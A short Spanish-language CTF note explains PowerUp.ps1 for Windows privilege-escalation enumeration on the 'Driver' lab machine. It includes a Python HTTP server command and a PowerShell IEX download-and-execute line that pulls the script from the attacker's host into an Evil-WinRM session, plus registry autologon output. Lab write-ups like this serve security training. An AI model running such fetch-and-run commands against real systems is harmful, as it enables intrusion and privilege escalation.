Powerup.ps1
PowerUp.ps1 es un script de PowerShell desarrollado por Will Schroeder (@harmj0y), parte de la suite PowerSploit.
Su objetivo es automatizar la enumeración de configuraciones inseguras en sistemas Windows que puedan permitirte realizar una escalada local de privilegios.
Es muy útil en la fase de post-explotación cuando ya tenés acceso limitado (por ejemplo como tony
en el CTF Driver) y querés encontrar maneras de obtener SYSTEM.
Algunas de las cosas que PowerUp.ps1 puede detectar:
Servicios con configuraciones inseguras (services misconfiguration)
Archivos con permisos inseguros
DLL hijacking opportunities
Tasks mal configuradas
Credenciales expuestas en registro
Bypass de UAC
Oportunidades de ejecución como SYSTEM
Drivers inseguros
En resumen: es una herramienta de enumeración de privesc enfocada en Windows, muy potente.
¿Como ejecutar este script desde remoto en una sesión del equipo comprometido con EvilWinRM?
En nuestro equipo levantamos un servidor con python desde la carpeta donde se encuentra el script PowerUp.ps1 y en el equipo comprometido tiramos el segundo comando:
┌──(root㉿kali)-[/home/kali/Documents/HTB/DRIVER]
└─# ls
ntlmhash PowerUp.ps1 pwned.scf Rubeus.exe shell2.exe shell.exe winPEASx64.exe
┌──(root㉿kali)-[/home/kali/Documents/HTB/DRIVER]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.106 - - [12/Jun/2025 00:15:11] "GET /PowerUp.ps1 HTTP/1.1" 200 -
*Evil-WinRM* PS C:\temp> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2/PowerUp.ps1')
Access denied
DefaultDomainName : DRIVER
DefaultUserName : tony
DefaultPassword :
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :
Check : Registry Autologons
Last updated